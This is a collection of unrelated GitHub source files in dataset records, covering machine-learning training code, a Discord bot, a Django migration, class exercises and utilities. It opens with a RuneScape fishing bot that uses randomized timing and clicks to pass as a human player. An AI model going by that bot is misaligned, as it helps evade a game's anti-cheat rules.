True\r\n\r\n\r\npytesseract.pytesseract.tesseract_cmd = r'C:\\Program Files\\Tesseract-OCR\\tesseract'\r\niflag = False\r\n\r\noptions = {0: random_inventory,\r\n 1: random_combat,\r\n 2: random_skills,\r\n 3: random_quests,\r\n 4: random_pause}\r\n\r\n\r\ndef drop_fish():\r\n print(\"dropping fish starting...\")\r\n invent_crop()\r\n drop_item()\r\n image_Rec_clicker(r'prawn_fish.png', 'dropping item', 5, 5, 0.9, 'left', 10, 620, 480, False)\r\n image_Rec_clicker(r'trout_fish.png', 'dropping item', 5, 5, 0.9, 'left', 10, 620, 480, False)\r\n image_Rec_clicker(r'salmon_fish.png', 'dropping item', 5, 5, 0.9, 'left', 10, 620, 480, False)\r\n image_Rec_clicker(r'lobster_fish.png', 'dropping item', 5, 5, 0.9, 'left', 10, 620, 480, False)\r\n release_drop_item()\r\n print(\"dropping fish done\")\r\n\r\n\r\ndef pick_random_fishing_spot(type):\r\n Image_Rec_single(type + '.png', 'picking fishing spot', 5, 5, 0.7, 'left', 10)\r\n\r\n\r\ndef powerfisher(type):\r\n j = 0\r\n while j < 10:\r\n randomizer(timer_break, ibreak)\r\n resizeImage()\r\n fished = Image_to_Text('thresh', 'textshot.png')\r\n # print(fished)\r\n if fished.lower() != 'fishing' and fished.lower() != 'plt]' and fished.lower() != 'ele]':\r\n random_breaks(0.2, 3)\r\n pick_random_fishing_spot(type)\r\n random_breaks(5, 10)\r\n if skill_lvl_up() != 0:\r\n print('level up')\r\n random_breaks(0.2, 3)\r\n pyautogui.press('space')\r\n random_breaks(0.1, 3)\r\n pyautogui.press('space')\r\n a = random.randrange(0, 2)\r\n # print(a)\r\n spaces(a)\r\n # invent_crop()\r\n invent = Image_count(type + '.png') + Image_count(r'sea_puzzle.png')\r\n print(\"fish & clues: \", invent)\r\n if type == 'prawn_fish' or type == 'lobster_fish':\r\n z = 26\r\n else:\r\n z = 25\r\n if invent > z - 2:\r\n random_breaks(0.2, 0.7)\r\n drop_fish()\r\n random_breaks(0.2, 0.7)\r\n pick_random_fishing_spot(type)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n time.sleep(2)\r\n resizeImage()\r\n x = random.randrange(100, 250)\r\n y = random.randrange(400, 500)\r\n pyautogui.click(x, y, button='right')\r\n ibreak = random.randrange(300, 2000)\r\n print('will break in ' + str(ibreak / 60) + ' minutes')\r\n timer_break = timer()\r\n powerfisher('prawn_fish')\r\n","repo_name":"EduardTruggelaar/osrs_basic_botting_functions","sub_path":"fishing.py","file_name":"fishing.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"18375718937","text":"import os\nfrom pathlib import Path\n\n#\n# The version number of pygit2\n#\n__version__ = '1.13.3'\n\n\n#\n# Utility functions to get the paths required for bulding extensions\n#\ndef _get_libgit2_path():\n # LIBGIT2 environment variable takes precedence\n libgit2_path = os.getenv('LIBGIT2')\n if libgit2_path is not None:\n return Path(libgit2_path)\n\n # Default\n if os.name == 'nt':\n return Path(r'%s\\libgit2' % os.getenv('ProgramFiles'))\n return Path('/usr/local')\n\n\ndef get_libgit2_paths():\n # Base path\n path = _get_libgit2_path()\n\n # Library dirs\n libgit2_lib = os.getenv('LIBGIT2_LIB')\n if libgit2_lib is None:\n library_dirs = [path / 'lib', path / 'lib64']\n else:\n library_dirs = [libgit2_lib]\n\n include_dirs = [path / 'include']\n return (\n path / 'bin',\n {\n 'libraries': ['git2'],\n 'include_dirs': [str(x) for x in include_dirs],\n 'library_dirs': [str(x) for x in library_dirs],\n }\n 
)\n","repo_name":"libgit2/pygit2","sub_path":"pygit2/_build.py","file_name":"_build.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":1533,"dataset":"github-code","pt":"31"} +{"seq_id":"18923219934","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 2 23:12:46 2019\n\n@author: isadora\n\"\"\"\n\nimport random\nimport numpy as np\nimport pandas as pd\nfrom os.path import join\nfrom datetime import datetime\nfrom itertools import product\n\nfrom src.utilities.utils import create_folder, get_files\nfrom src.classification.motion import MotionDataset\nfrom src.classification.model_classification import Classification\n\n\nnp.random.seed(321)\n\n\nclass OPClassification:\n \"\"\" It classifies motion (extracting point features from it) and OP features.\n \n Parameters\n ----------\n op_values : nested lists\n OP Transformation parameters (D, tau) used to classify\n ex: [[3, 1], [3, 1]]\n \n motion_features : list of str\n motion feature names\n \n folder_op : str\n absolute path where the op features are\n \n folder_features : str\n absolute path where the motion feature data is\n \n folder_classification : str\n absolute path where to save the classification results\n (we add the time to each data, so the results won't overwrite)\n \n model : sklearn-based classifier\n supervised model that will classify\n \"\"\"\n \n\n def __init__(self, op_values, motion_features, \n folder_op, folder_features, \n folder_classification, model, op_features, n_samples):\n \n self.op_values = op_values\n self.motion_features = motion_features\n self.folder_op = folder_op\n self.folder_features = folder_features\n self.model = model\n self.op_features = op_features\n self.n_samples = n_samples\n \n filename = join(folder_classification + \"_\" + str(datetime.now()), \"\")\n self.folder_classification = filename \n \n \n def _get_data(self, transportation, parameter):\n \"\"\" Reads the OP Transformation files and organized them in a\n single dataset: X for features and y for labels.\n \n Parameters\n ----------\n transportation : list of str\n list of transportation mode name used to classification\n \n parameter : list of int\n list of OP parameters: D and tau\n \n Returns\n -------\n X : pandas dataframe\n dataframe of features \n \n y : pandas dataframe\n class labels\n \"\"\"\n \n D, tau = parameter\n op_values = \"_D\" + str(D) + \"_t\" + str(tau) + \".csv\"\n features_name = [m + op_values for m in self.motion_features]\n # ex: 'distance_D3_t1.csv'\n\n X = pd.DataFrame()\n y = pd.DataFrame() \n \n print(\"### OP features: {}\".format(self.op_features))\n \n for transport in transportation:\n \n # path to op transformation files\n # ex: query = 'op_bus_distance_D3_t1.csv'\n # ex: op_files = 'db/GeoLife/op_features/op_bus_distance_D3_t1.csv'\n file_name = \"op_\" + transport + \"_\"\n query = [file_name + f for f in features_name] \n op_files = [self.folder_op + q for q in query]\n \n df_transport_op = pd.DataFrame() \n \n for file in op_files: \n op_csv = pd.read_csv(file, usecols = self.op_features)\n op_csv = op_csv[self.op_features] # to assure order\n \n # axis = 1 is by column, axis = 0 is by rows\n concat = [df_transport_op, op_csv]\n df_transport_op = pd.concat(concat, axis = 1, ignore_index = True)\n df_transport_op = df_transport_op.dropna()\n \n \n \n ### motion_features\n motion = MotionDataset()\n \n file_name = transport + \"*\" + \".csv\"\n path_transport = get_files(self.folder_features, file_name, 
True)\n \n feature_df = motion.build_dataset(self.motion_features, path_transport)\n \n concat2 = [df_transport_op, feature_df]\n df_transport_op = pd.concat(concat2, axis = 1, ignore_index = True) \n \n \n df_transport_op = df_transport_op[:self.n_samples] \n \n # features\n concat1 = [X, df_transport_op]\n X = pd.concat(concat1, axis = 0, ignore_index = True)\n \n # labels\n op_class = pd.DataFrame([transport] * len(df_transport_op))\n concat2 = [y, op_class]\n y = pd.concat(concat2, axis = 0, ignore_index = True) \n\n \n n = len(X.columns)\n \n print(\"#### OP features size: {}\".format(n))\n print(\"size\", len(X), len(y))\n \n return X, y\n \n\n def _build_dataset(self, parameter, transports):\n \"\"\" Only for GeoLife dataset. Get the transportation mode set to classify\n based on previous works (helps comparing the results)\n \n Parameters\n ----------\n parameter : list of int\n list of OP parameters: D and tau\n \n Returns\n -------\n X : pandas dataframe\n dataframe of features\n length: Information Theory features * motion features * parameter\n \n y : pandas dataframe\n class labels \n \"\"\"\n\n \n# transports = [\"bus\", \"car\", \"taxi\", \"walk\", \"bike\"]\n \n X, y = self._get_data(transports, parameter)\n \n if \"car\" in transports or \"taxi\" in transports:\n y = y.replace(to_replace = \"car\", value = \"driving\")\n y = y.replace(to_replace = \"taxi\", value = \"driving\")\n \n \n print(\"TRANSPORTATION MODE: \", transports)\n \n# self._save_dataset(X, y, parameter)\n \n return X, y \n \n \n def _colnames(self, features):\n \n colnames = list(product(self.motion_features, features))\n colnames = list(map('_'.join, colnames))\n \n return colnames\n \n \n def _save_dataset(self, X, y, parameter):\n \"\"\" It saves the dataset that will be used to classify \n (helpful for plotting).\n \n Parameters\n ----------\n X : pandas dataframe\n dataframe of features \n \n y : pandas dataframe\n class labels\n \"\"\"\n \n # Save dataset\n create_folder(self.folder_classification)\n \n ## get feature name \n colnames_op = self._colnames(self.op_features)\n \n colnames = [\"classes\"] + colnames_op\n name = \"_op_\" + str(parameter) + \".csv\"\n \n data = pd.concat([y, X], axis = 1, ignore_index = True)\n data.columns = colnames\n filename = self.folder_classification + \"DATASET_\" + name\n \n data.to_csv(filename, index = False) \n \n\n def _save_results(self, df, file_name):\n \"\"\" It saves the classification results (metrics and confusion matrices)\n in the self.folder_classification (it will create the folder, if it doesn't exist).\n \n Parameters\n ----------\n df : pandas dataframe\n the results to save\n \n file_name : str\n the name to save the result\n \n Returns\n -------\n no value\n \"\"\"\n \n create_folder(self.folder_classification)\n \n path_to_save = join(self.folder_classification, file_name)\n \n try:\n df.to_csv(path_to_save, sep = \",\")\n \n except: # for confusion matrices\n \n df = np.array(df)\n with open(path_to_save, 'w') as outfile:\n for enum, data_slice in enumerate(df):\n \n if enum != 10:\n # Writing out a break to indicate different slices...\n outfile.write('# Confusion Matrix for CV{}\\n'.format(enum+1))\n else:\n outfile.write('# Total Confusion Matrix\\n')\n\n np.savetxt(outfile, data_slice, fmt='%d')\n \n \n \n \n def classification(self, n_folds, transports):\n \"\"\" It calls the classification pipeline: join the dataset and classify it.\n Also, it saves the classification results in the chosen folder.\n \n Parameters\n ----------\n n_folds 
: int\n how many folds to divide data to cross-validation\n \n Returns\n -------\n no value\n \"\"\"\n\n \n print(\"--- Saving at {}\".format(self.folder_classification)) \n\n for parameter in self.op_values:\n\n print(\"OP PARAMETERS: {}\".format(str(parameter)))\n print(\"FEATURES: {}\".format(str(self.motion_features)))\n \n X, y = self._build_dataset(parameter, transports)\n \n clf = Classification()\n standardize = True\n df, cm = clf.classification(X, y, self.model, standardize, n_folds)\n \n # save data\n filename = \"METRICS_\" + str(parameter) + \".csv\"\n self._save_results(df, filename)\n\n filename = \"ConfusionMatrices_\" + str(parameter) + \".txt\"\n self._save_results(cm, filename)\n \n print(\"\\n-------------------------------------------------\")\n print(\"-------------------------------------------------\\n\")\n","repo_name":"icps/tmc_ordinal_patterns","sub_path":"src/classification/op.py","file_name":"op.py","file_ext":"py","file_size_in_byte":10162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"22392733432","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('movies', '0011_auto_20150607_1101'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Poster',\n fields=[\n ('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),\n ('source_url', models.URLField(null=True)),\n ('source_updated', models.DateTimeField(null=True)),\n ('image', models.ImageField(null=True, upload_to='', height_field='height', width_field='field')),\n ('image_updated', models.DateTimeField(null=True)),\n ('width', models.PositiveIntegerField(null=True)),\n ('height', models.PositiveIntegerField(null=True)),\n ],\n ),\n migrations.AddField(\n model_name='movie',\n name='poster',\n field=models.OneToOneField(to='movies.Poster', on_delete=django.db.models.deletion.SET_NULL, null=True),\n ),\n ]\n","repo_name":"despawnerer/thinkies","sub_path":"movies/migrations/0012_auto_20150607_1103.py","file_name":"0012_auto_20150607_1103.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19972193498","text":"whisky_price = float(input())\nbeer_amount = float(input())\nwine_amount = float(input())\nrakia_amount = float(input())\nwhisky_amount = float(input())\n\nrakia_price = whisky_price / 2\nwine_price = rakia_price - 0.4*rakia_price\nbeer_price = rakia_price - 0.8*rakia_price\n\nwhisky_sum = whisky_amount*whisky_price\nbeer_sum = beer_price * beer_amount\nwine_sum = wine_price * wine_amount\nrakia_sum = rakia_price * rakia_amount\n\n\ntotal_sum = whisky_sum + beer_sum + wine_sum + rakia_sum\nprint(f' {total_sum: .2f} ')\n\n","repo_name":"svgeesus/svgeesus.github.io","sub_path":"Exercises/Alchocol_Market.py","file_name":"Alchocol_Market.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"31"} +{"seq_id":"21536893873","text":"import board\nimport digitalio\nfrom adafruit_debouncer import Debouncer\n\npin = digitalio.DigitalInOut(board.D10)\npin.direction = digitalio.Direction.INPUT\npin.pull = digitalio.Pull.DOWN\nswitch = Debouncer(pin)\n\nwhile True:\n switch.update()\n if switch.fell:\n print(\"Just released\")\n if switch.rose:\n print(\"Just 
pressed\")","repo_name":"MichaelStickels/Macro_Pad_2.0","sub_path":"Firmware/Button_Test.py","file_name":"Button_Test.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24006459050","text":"import logging\nimport random\n\nimport numpy as np\n\n\ndef crossover(ind1, ind2, uniform=0.5):\n # log = logging.getLogger('crossover')\n child = ind1.copy()\n\n rand = np.random.random(size=child.gen.size)\n child.gen = np.where(rand > uniform, child.gen, ind2.gen)\n\n return child\n\n\ndef tournament(pop, size):\n # log = logging.getLogger('tournament')\n\n assert size * 2 < len(\n pop.ind\n ), f\"Tournament size ({size}) has to be lower than population ({len(pop.ind)}) // 2\"\n\n # Form groups\n g1g2 = np.random.choice(pop.ind, size=size * 2, replace=False)\n group1 = g1g2[:size]\n group2 = g1g2[size:]\n\n # Pick and return fittest from each group\n fit1 = np.argmin([x.val for x in group1])\n fit2 = np.argmin([x.val for x in group2])\n\n i1 = group1[fit1]\n i2 = group2[fit2]\n\n # log.debug(\"{}, {}\".format(i1.id, i2.id))\n\n return i1, i2\n\n\ndef mutation(ind, rate, scale):\n \"\"\"\n Mutate genes. `rate` controls how many genes are mutated.\n\n :param ind: Individual\n :param rate: float (0-1), mutation rate\n :param scale: standard deviation of the normal distribution\n :return: mutated Individual (copy)\n \"\"\"\n # log = logging.getLogger('mutation')\n\n # Draw random value to be compared with rate\n mut = np.random.rand(ind.gen.size)\n\n # Draw new random genes from a normal distribution\n mut_gen = np.random.normal(loc=ind.gen, scale=scale)\n # To 0-1 range\n mut_gen = np.where(mut_gen > 1.0, 1.0, mut_gen)\n mut_gen = np.where(mut_gen < 0.0, 0.0, mut_gen)\n # Substitute genes where mut < rate\n new_gen = np.where(mut < rate, mut_gen, ind.gen)\n\n # log.debug(f\"Old genes: {ind.gen}\")\n # log.debug(f\"Candidate genes {mut_gen}\")\n # log.debug(f\"New genes {new_gen}\")\n\n mutind = ind.copy()\n mutind.set_genes(new_gen)\n\n return mutind\n","repo_name":"krzysztofarendt/modestga","sub_path":"modestga/operators.py","file_name":"operators.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"73610996568","text":"import subprocess\nimport sys\n\ndef install(package):\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", \"-i\",\n \"https://pypi.tuna.tsinghua.edu.cn/simple\", \"-U\", package])\n\ninstall(\"imgaug\")\n\nimport os\nimport cv2\nimport time\nimport random\nimport pickle\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torchvision.utils as vutils\nimport torchvision.models as models\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom tqdm import trange\nfrom scipy.spatial import distance\nfrom collections import OrderedDict\nfrom imgaug import augmenters as iaa\nfrom IPython.display import clear_output\n\nfrom lib.utils_torch import Identity\nfrom lib.utils import normalize, read_all_imgs, extractor\n\nos.environ[\"KMP_DUPLICATE_LIB_OK\"]=\"TRUE\"\n\n_root = \"./imagenet/ILSVRC/Data/CLS-LOC/train\"\nmodel_path = \"./models/final_res50_model_training_with_ImageNet.pth\"\n\nclass Net(nn.Module):\n\n def __init__(self, path_pre=None, gpus=[]):\n super(Net, self).__init__()\n self.pre = models.resnet50(pretrained=False)\n\n if path_pre is not None:\n 
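# warm-start the ResNet-50 backbone from a local checkpoint when a path is given\n            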
self.pre.load_state_dict(torch.load(path_pre))\n\n self.pre.fc = nn.Linear(2048, 768)\n self.act = nn.Tanh()\n\n if len(gpus) > 1:\n self.pre = nn.DataParallel(self.pre, gpus)\n\n def forward(self, x):\n h = self.pre(x)\n h = self.act(h)\n return h\n\nclass Loss(nn.Module):\n\n def __init__(self, device=torch.device(\"cpu\")):\n super(Loss, self).__init__()\n self.ce = nn.CrossEntropyLoss()\n\n self.device = device\n self.to(device)\n\n def forward(self, x, mode, optimizer=None, scheduler=None):\n \"\"\"\n x: (k/j (classes), m/i (samples), c (n_features))\n \"\"\"\n centers = torch.mean(x, 1, keepdim=False)\n sims = -torch.cdist(x.reshape([-1, x.size(-1)]), centers, p=2)\n# sims = torch.max(sims, torch.tensor(-5.0).to(self.device))\n\n if mode==\"softmax\":\n labels = torch.tensor(list(np.arange(x.size(0)).repeat(x.size(1)))).to(self.device)\n loss = self.ce(sims, labels)\n\n elif mode==\"contrast\":\n indices = list(np.arange(sims.size(0)))\n labels = list(np.arange(x.size(0)).repeat(x.size(1)))\n sims_clone = torch.clone(sims)\n sims_clone[indices, labels] = -1e32\n loss_self = sims[indices, labels]\n loss_others = torch.max(sims_clone, dim=1).values\n # loss = 1-torch.sigmoid(loss_self)+torch.sigmoid(loss_others)\n loss = loss_others-loss_self\n loss = torch.mean(loss)\n\n else:\n raise ValueError(\"Invalid mode.\")\n\n if optimizer is not None:\n # back propagation and update centers\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if scheduler is not None:\n scheduler.step()\n\n return loss\n\nroots = sorted([x for x in os.listdir(_root) if x[0]!='.'])\n\npaths = []\npath_labels = []\nfor i in trange(len(roots)):\n root = os.path.join(_root, roots[i])\n paths_ = read_all_imgs(root, _iter=False)\n paths = paths+paths_\n path_labels = path_labels+[i,]*len(paths_)\n\npaths = [x for x in zip(paths, path_labels)]\nprint(len(paths))\n\nlr = 2e-4\ngpus = [0,1,2,3]\nn_pics = 16*len(gpus)\nn_samples = 16 # min=4\n\nif len(gpus)>0:\n device = torch.device(\"cuda:\"+str(gpus[0]))\nelse:\n device = torch.device(\"cpu\")\n\nmean = [0.485, 0.456, 0.406]\nstd = [0.229, 0.224, 0.225]\n\netr = extractor()\n\nmy_model = Net().to(device)\nmy_model = nn.DataParallel(my_model, gpus)\n\n# my_model.load_state_dict(torch.load(model_path))\n\noptimizer = optim.Adam(my_model.parameters(), lr)\ncriterion = Loss(device)\n\nbest_loss = 1e8\ni_epoch = -1\nloss_log = []\n\naug_seq_all = iaa.Sequential([\n iaa.Affine(rotate=(-35, 35)),\n iaa.Crop(percent=(0, 0.1)),\n iaa.GaussianBlur(sigma=(0.0, 3.0)),\n iaa.AddToHue((-20, 20)),\n iaa.AddToSaturation((-150, 50)),\n iaa.MultiplyAndAddToBrightness(mul=(0.75, 1.3), add=(-40, 40)),\n iaa.GammaContrast((0.75, 1.3)),\n iaa.GammaContrast((0.75, 1.3), per_channel=True),\n# iaa.ChangeColorTemperature((3000, 9000)),\n iaa.AdditiveGaussianNoise(scale=(0, 0.1*255)),\n iaa.JpegCompression(compression=(0, 99)),\n iaa.MotionBlur(k=(3,15)),\n iaa.CoarseDropout(0.02, size_percent=0.1, per_channel=0.5),\n])\n\nstart_time = time.time()\n\nwhile True:\n i_epoch+=1\n _indices = np.random.choice(len(paths), len(paths), replace=False)\n n_round = int(len(paths)/n_pics)\n for i_round in range(n_round):\n _augs = []\n indices = _indices[i_round * n_pics : (i_round+1) * n_pics]\n for index in indices:\n img = cv2.imread(paths[index][0])[...,::-1]\n augs = etr.extract(img, n_augs=n_samples, target_size=224, aug_seq=aug_seq_all, resolution_aug=\"False\")\n augs = normalize(augs.transpose([0,3,1,2]), mean=mean, std=std)\n _augs.append(augs)\n _augs = np.concatenate(_augs, 
axis=0)\n Xs = torch.from_numpy(_augs.astype(np.float32)).to(device)\n hs = my_model(Xs)\n hs = torch.reshape(hs, [n_pics, n_samples, -1])\n\n loss = criterion(hs, mode=\"contrast\", optimizer=optimizer)\n loss_log.append(loss.item())\n time_cost = (time.time()-start_time)/3600\n\n print('[Epoch %d][%d/%d]\\tLoss: %.4f\\tTime: %.4f hrs'\n % (i_epoch+1, i_round+1, n_round, loss.item(), time_cost))\n\n if (len(loss_log)+1)%20==0:\n curr_loss = np.mean(loss_log[-20:])\n print(\"------------------------\")\n print(\"curr_loss\", curr_loss, \"best_loss\", best_loss)\n print(model_path)\n if curr_loss bool:\n words = s.split()\n \n if len(pattern) != len(words):\n return False\n \n word2patDict = {}\n pat2wordDict = {}\n for pat, word in zip(pattern, words):\n if pat not in pat2wordDict and word not in word2patDict:\n pat2wordDict[pat] = word\n word2patDict[word] = pat\n elif pat not in pat2wordDict or word not in word2patDict:\n return False\n else:\n if pat2wordDict[pat] != word or word2patDict[word] != pat:\n return False\n \n return True\n ","repo_name":"has64pitt/leetcode4fun","sub_path":"solutions/0250-0299/0290_Word_Pattern/solutions.py","file_name":"solutions.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37542501471","text":"import discord, logging\nfrom discord.ext import commands\nfrom util.functions import randomDiscordColor # pylint: disable=no-name-in-module\nfrom models import BotConfig\nfrom util.publicCommands import publicCommand # pylint: disable=no-name-in-module\nfrom mongoengine import DoesNotExist\n\nclass Miscellaneous(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @publicCommand\n @commands.command()\n async def say(self, ctx: commands.Context, *, content: str):\n \"\"\"\n Have the bot will respond with whatever argmeument you give it\n \"\"\"\n await ctx.send(content)\n \n @publicCommand \n @commands.command()\n async def react(self, ctx: commands.Context, messageId, emoji: str):\n message = await ctx.channel.fetch_message(messageId)\n await message.add_reaction(emoji)\n\n @commands.Cog.listener()\n async def on_member_join(self, member):\n print('guild id')\n print(member.guild.id)\n config = BotConfig.BotConfig.getForGuild(member.guild.id)\n channel = member.guild.get_channel(config.welcomeChannel)\n await channel.send(f'Welcome to {member.guild.name}, {member.mention}!')\n try:\n memberRole = member.guild.get_role(config.memberRoleId)\n except DoesNotExist:\n # Just me being lazy... 
That is the id of member role in tit\n memberRole = member.guild.get_role(607396881546477661)\n\n await member.add_roles(memberRole)\n\n @commands.Cog.listener()\n async def on_member_remove(self, member):\n config = BotConfig.BotConfig.getForGuild(member.guild.id)\n channel = member.guild.get_channel(config.welcomeChannel)\n await channel.send(f'{member.name} just left :(')\n \n\ndef setup(bot: commands.Bot):\n bot.add_cog(Miscellaneous(bot))","repo_name":"teens-in-tech/DiscordBot","sub_path":"cogs/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"69962296089","text":"# Problem Set 5: 6.00 Word Game\n# Name: \n# Collaborators: \n# Time: \n#\n\nimport random\nimport string\nimport time\nimport json\nimport itertools\n\n\nVOWELS = 'aeiou'\nCONSONANTS = 'bcdfghjklmnpqrstvwxyz'\nHAND_SIZE = 7\npoints_dict = {}\nrearrange_dict = {}\n\n\nSCRABBLE_LETTER_VALUES = {\n 'a': 1, 'b': 3, 'c': 3, 'd': 2, 'e': 1, 'f': 4, 'g': 2, 'h': 4, 'i': 1, 'j': 8, 'k': 5, 'l': 1, 'm': 3, 'n': 1, 'o': 1, 'p': 3, 'q': 10, 'r': 1, 's': 1, 't': 1, 'u': 1, 'v': 4, 'w': 4, 'x': 8, 'y': 4, 'z': 10\n}\n\n# -----------------------------------\n# Helper code\n# (you don't need to understand this helper code)\n\nWORDLIST_FILENAME = \"words.txt\"\n\ndef load_words():\n \"\"\"\n Returns a list of valid words. Words are strings of lowercase letters.\n \n Depending on the size of the word list, this function may\n take a while to finish.\n \"\"\"\n print(\"Loading word list from file...\")\n # inFile: file\n inFile = open(WORDLIST_FILENAME, 'r', encoding='ascii')\n # wordlist: list of strings\n wordlist = []\n for line in inFile:\n wordlist.append(line.strip().lower())\n print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\n\ndef get_frequency_dict(sequence):\n \"\"\"\n Returns a dictionary where the keys are elements of the sequence\n and the values are integer counts, for the number of times that\n an element is repeated in the sequence.\n\n sequence: string or list\n return: dictionary\n \"\"\"\n # freqs: dictionary (element_type -> int)\n freq = {}\n for x in sequence:\n freq[x] = freq.get(x,0) + 1\n return freq\n\n\n# (end of helper code)\n# -----------------------------------\n\n#\n# Problem #1: Scoring a word\n#\ndef get_word_score(word, n):\n \"\"\"\n Returns the score for a word. 
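Illustrative examples (added; not part of the original handout):\n >>> get_word_score('weed', 7) # w=4, e=1, e=1, d=2; no length bonus\n 8\n >>> get_word_score('waybill', 7) # all 7 letters used: 15 + 50 bonus\n 65\n\n 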
Assumes the word is a\n valid word.\n\n The score for a word is the sum of the points for letters\n in the word, plus 50 points if all n letters are used on\n the first go.\n\n Letters are scored as in Scrabble; A is worth 1, B is\n worth 3, C is worth 3, D is worth 2, E is worth 1, and so on.\n\n word: string (lowercase letters)\n returns: int >= 0\n \"\"\"\n score = 0\n\n for i in word:\n score = score + SCRABBLE_LETTER_VALUES.get(i)\n\n if len(word) == n:\n score = score + 50\n\n return score\n#\n# Make sure you understand how this function works and what it does!\n#\ndef display_hand(hand):\n \"\"\"\n Displays the letters currently in the hand.\n\n For example:\n display_hand({'a':1, 'x':2, 'l':3, 'e':1})\n Should print() out something like:\n a x x l l l e\n The order of the letters is unimportant.\n\n hand: dictionary (string -> int)\n \"\"\"\n for letter in hand.keys():\n for j in range(hand[letter]):\n print( letter, end=' ' ) # print() all on the same line\n print() # print() an empty line\n\n#\n# Make sure you understand how this function works and what it does!\n#\ndef deal_hand(n):\n \"\"\"\n Returns a random hand containing n lowercase letters.\n At least n/3 the letters in the hand should be VOWELS.\n\n Hands are represented as dictionaries. The keys are\n letters and the values are the number of times the\n particular letter is repeated in that hand.\n\n n: int >= 0\n returns: dictionary (string -> int)\n \"\"\"\n hand={}\n num_vowels = int(n / 3) #******* I CHANGED THIS FOR PYTHON3 *****\n \n for i in range(num_vowels):\n x = VOWELS[random.randrange(0,len(VOWELS))]\n hand[x] = hand.get(x, 0) + 1\n \n for i in range(num_vowels, n): \n x = CONSONANTS[random.randrange(0,len(CONSONANTS))]\n hand[x] = hand.get(x, 0) + 1\n \n return hand\n\n#\n# Problem #2: Update a hand by removing letters\n#\ndef update_hand(hand, word):\n \"\"\"\n Assumes that 'hand' has all the letters in word.\n In other words, this assumes that however many times\n a letter appears in 'word', 'hand' has at least as\n many of that letter in it. \n\n Updates the hand: uses up the letters in the given word\n and returns the new hand, without those letters in it.\n\n Has no side effects: does not mutate hand.\n\n word: string\n hand: dictionary (string -> int) \n returns: dictionary (string -> int)\n \"\"\"\n \n for letter in word:\n hand[letter] = hand.get(letter,0) - 1\n return hand\n\n# PS05 Implementation of is_valid_word (unused)\ndef is_valid_word(word, hand, word_list):\n \"\"\"\n Returns True if word is in the word_list and is entirely\n composed of letters in the hand. Otherwise, returns False.\n Does not mutate hand or word_list.\n \n word: string\n hand: dictionary (string -> int)\n word_list: list of lowercase strings\n \"\"\"\n\n hand2 = hand.copy()\n\n for letter in word:\n if hand2.get(letter, 0) == 0: #if letter is not in hand (or letter has run out)\n return False\n hand2[letter] = hand2.get(letter,0) -1 #decrement letter in hand\n\n if word in word_list:\n return True\n else: \n return False\n\n# PS06 Implementation of is_valid_word\ndef is_valid_word_points(word, hand, points_dict):\n \"\"\"\n Returns True if word is in the word_list and is entirely\n composed of letters in the hand. 
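For example (added illustration, not in the original):\n >>> is_valid_word('dew', {'d': 1, 'e': 2, 'w': 1}, ['dew'])\n True\n 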
Otherwise, returns False.\n Does not mutate hand or word_list.\n \n word: string\n hand: dictionary (string -> int)\n word_list: list of lowercase strings\n \"\"\"\n\n hand2 = hand.copy()\n\n for letter in word:\n if hand2.get(letter, 0) == 0: #if letter is not in hand (or letter has run out)\n return False\n hand2[letter] = hand2.get(letter,0) -1 #decrement letter in hand\n\n if word in points_dict:\n return True\n else: \n return False\n\ndef pick_best_word(hand, points_dict):\n\n \"\"\" Return the highest scoring word from points_dict that can be made with thegiven hand.\n Return '.' if no words can be made with the given hand.\n \"\"\"\n current_max = 0\n current_word = \".\"\n\n for word in word_list:\n if is_valid_word_points(word, hand, points_dict) and points_dict[word]>current_max:\n current_max = points_dict[word]\n current_word = word\n return current_word\n\ndef pick_best_word_faster(hand, rearrange_dict):\n hand_subsets = get_hand_subsets(hand)\n current_max = 0\n current_word = '.'\n for subset in hand_subsets:\n if subset in rearrange_dict:\n temp_word = rearrange_dict[subset] #unscramble sorted word\n if points_dict[temp_word] > current_max:\n current_max = points_dict[temp_word]\n current_word = temp_word\n return current_word\n\ndef get_hand_subsets(hand):\n \"\"\"\n hand_subsets is subsets of the letters of hand.\n \"\"\"\n letters = [c for c in hand for i in range(hand[c])]\n hand_subsets = ()\n for i in reversed(range(1, len(letters)+1)):\n for tup in set(itertools.combinations(letters, i)):\n hand_subsets += (''.join(sorted(tup)), )\n return hand_subsets\n\ndef get_words_to_points(word_list):\n \"\"\" Return a dict that maps every word in word_list to its point value.\n \"\"\"\n for word in word_list:\n score = get_word_score(word, len(word))\n points_dict[word] = score\n\n # WRITE THE POINTS_DICT TO JSON\n # with 